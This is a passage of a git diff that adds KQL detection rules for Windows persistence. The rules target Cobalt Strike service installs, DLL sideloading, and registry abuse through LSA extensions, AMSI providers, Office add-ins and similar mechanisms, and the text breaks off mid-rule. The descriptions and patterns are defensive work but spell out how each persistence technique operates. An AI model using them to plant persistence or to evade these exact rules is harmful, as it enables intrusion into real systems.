b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql new file mode 100644 index 00000000..63ed0524 --- /dev/null +++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql @@ -0,0 +1,13 @@ +// Title: Potential CobaltStrike Service Installations - Registry +// Author: Wojciech Lesicki +// Date: 2021-06-29 +// Level: high +// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql new file mode 100644 index 00000000..48b94c8c --- /dev/null +++ b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential EACore.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-08-03 +// Level: high +// Description: Detects potential DLL sideloading of "EACore.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql new file mode 100644 index 00000000..13ffbca1 --- /dev/null +++ b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Edputil.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: high +// Description: Detects potential DLL sideloading of "edputil.dll" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql new file mode 100644 index 00000000..bc09ff85 --- /dev/null +++ b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql @@ -0,0 +1,13 @@ +// Title: Potential Goopdate.DLL Sideloading +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. +// - Other third party chromium browsers located in AppData + +DeviceImageLoadEvents +| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql new file mode 100644 index 00000000..73a2d0c8 --- /dev/null +++ b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql @@ -0,0 +1,10 @@ +// Title: Potential Iviewers.DLL Sideloading +// Author: X__Junior (Nextron Systems) +// Date: 2023-03-21 +// Level: high +// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql new file mode 100644 index 00000000..c9a9cef3 --- /dev/null +++ b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Mfdetours.DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql new file mode 100644 index 00000000..a3b0ff5c --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Attempt Via ErrorHandler.Cmd +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-09 +// Level: medium +// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence +The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. + +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceFileEvents +| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql new file mode 100644 index 00000000..6b5a2e4b --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via AutodialDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-10 +// Level: high +// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql new file mode 100644 index 00000000..3ea63ef9 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via CHM Helper DLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql new file mode 100644 index 00000000..02f63428 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Custom Protocol Handler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-30 +// Level: medium +// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment. + +DeviceRegistryEvents +| where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql new file mode 100644 index 00000000..e8da8e44 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql @@ -0,0 +1,18 @@ +// Title: Potential Persistence Via Disk Cleanup Handler - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. +The disk cleanup manager is part of the operating system. It displays the dialog box […] +The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. +Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. +Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. +Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. + +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate new entry added by windows + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith "\\Windows Upgrade Log Files"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql new file mode 100644 index 00000000..5ab794a6 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via DLLPathOverride +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceRegistryEvents +| where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql new file mode 100644 index 00000000..9bf56e81 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via Event Viewer Events.asp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-17 +// Level: medium +// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql new file mode 100644 index 00000000..16167834 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql @@ -0,0 +1,10 @@ +// Title: Potential Persistence Via Excel Add-in - Registry +// Author: frack113 +// Date: 2023-01-15 +// Level: high +// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.006 + +DeviceRegistryEvents +| where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql new file mode 100644 index 00000000..dab9596b --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql @@ -0,0 +1,14 @@ +// Title: Potential Persistence Via LSA Extensions +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. +The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading. + +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql new file mode 100644 index 00000000..52afb24c --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Microsoft Office Add-In +// Author: NVISO +// Date: 2020-05-11 +// Level: high +// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.006 +// False Positives: +// - Legitimate add-ins + +DeviceFileEvents +| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql new file mode 100644 index 00000000..5313eb2b --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql @@ -0,0 +1,13 @@ +// Title: Potential Persistence Via Microsoft Office Startup Folder +// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-02 +// Level: high +// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Loading a user environment from a backup or a domain controller +// - Synchronization of templates + +DeviceFileEvents +| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql new file mode 100644 index 00000000..0674aea0 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Mpnotify +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql new file mode 100644 index 00000000..c7ae5b66 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via MyComputer Registry Keys +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-09 +// Level: high +// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example) +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for + +DeviceRegistryEvents +| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)" \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql new file mode 100644 index 00000000..c225fb44 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via New AMSI Providers - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: high +// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate security products adding their own AMSI providers. Filter these according to your environment + +DeviceRegistryEvents +| where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql new file mode 100644 index 00000000..5165e101 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql @@ -0,0 +1,13 @@ +// Title: Potential Persistence Via Notepad++ Plugins +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: medium +// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Possible FPs during first installation of Notepad++ +// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities + +DeviceFileEvents +| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll")))))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql new file mode 100644 index 00000000..13afbc05 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Outlook Form +// Author: Tobias Michalski (Nextron Systems) +// Date: 2021-06-10 +// Level: high +// Description: Detects the creation of a new Outlook form which can contain malicious code +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.003 +// False Positives: +// - Legitimate use of outlook forms + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms") \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql new file mode 100644 index 00000000..b561b52f --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via TypedPaths +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\SysWOW64\\explorer.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql new file mode 100644 index 00000000..53e07333 --- /dev/null +++ b/KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Visual Studio Tools for Office +// Author: Bhabesh Raj +// Date: 2021-01-10 +// Level: medium +// Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. +// MITRE Tactic: Persistence +// Tags: attack.t1137.006, attack.persistence +// False Positives: +// - Legitimate Addin Installation + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Software\\Microsoft\\Office\\Outlook\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Word\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Excel\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\Office\\Powerpoint\\Addins*" or RegistryKey endswith "\\Software\\Microsoft\\VSTO\\Security\\Inclusion*") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe")) or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\Integrator.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql new file mode 100644 index 00000000..b7e27451 --- /dev/null +++ b/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql @@ -0,0 +1,10 @@ +// Title: Potential Privilege Escalation via Service Permissions Weakness +// Author: Teymur Kheirkhabarov +// Date: 2019-10-26 +// Level: high +// Description: Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\ImagePath" or ProcessCommandLine contains "\\FailureCommand" or ProcessCommandLine contains "\\ServiceDll") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potential_qakbot_registry_activity.kql b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql new file mode 100644 index 00000000..4bffdbfa --- /dev/null +++ b/KQL/rules/Persistence/potential_qakbot_registry_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Qakbot 